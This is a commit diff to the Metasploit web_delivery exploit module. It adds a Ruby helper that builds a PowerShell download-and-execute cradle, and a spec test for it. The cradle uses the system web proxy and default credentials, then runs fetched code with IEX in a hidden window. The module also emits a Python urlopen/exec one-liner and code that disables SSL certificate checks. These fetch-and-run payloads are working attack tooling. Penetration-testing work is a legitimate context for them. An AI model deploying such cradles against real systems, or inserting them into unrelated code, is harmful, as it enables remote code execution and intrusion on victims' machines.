Make web_delivery proxy aware
parent
44fa188e71
commit
66c9222968
|
@ -72,6 +72,22 @@ module Powershell
|
|||
def self.ignore_ssl_certificate
|
||||
'[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
|
||||
end
|
||||
|
||||
#
|
||||
# Use the default system web proxy and credentials to download a URL
|
||||
# as a string and execute the contents as PowerShell
|
||||
#
|
||||
# @param url [String] string to download
|
||||
#
|
||||
# @return [String] PowerShell code to download a URL
|
||||
def self.proxy_aware_download_and_exec_string(url)
|
||||
var = Rex::Text.rand_text_alpha(1)
|
||||
cmd = "$#{var}=new-object net.webclient;"
|
||||
cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();"
|
||||
cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
|
||||
cmd << "IEX $#{var}.downloadstring('#{url}');"
|
||||
cmd
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -89,7 +89,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
|
||||
when 'PSH'
|
||||
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
|
||||
download_and_run = "#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{url}'))"
|
||||
download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
|
||||
download_and_run = "#{ignore_cert}#{download_string}"
|
||||
print_line generate_psh_command_line(
|
||||
noprofile: true,
|
||||
windowstyle: 'hidden',
|
||||
|
|
|
@ -40,5 +40,14 @@ describe Rex::Powershell::PshMethods do
|
|||
script.include?('Get-QADComputer').should be_truthy
|
||||
end
|
||||
end
|
||||
describe "::proxy_aware_download_and_exec_string" do
|
||||
it 'should return some powershell' do
|
||||
url = 'http://blah'
|
||||
script = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
|
||||
script.should be
|
||||
script.include?(url).should be_truthy
|
||||
script.downcase.include?('downloadstring').should be_truthy
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue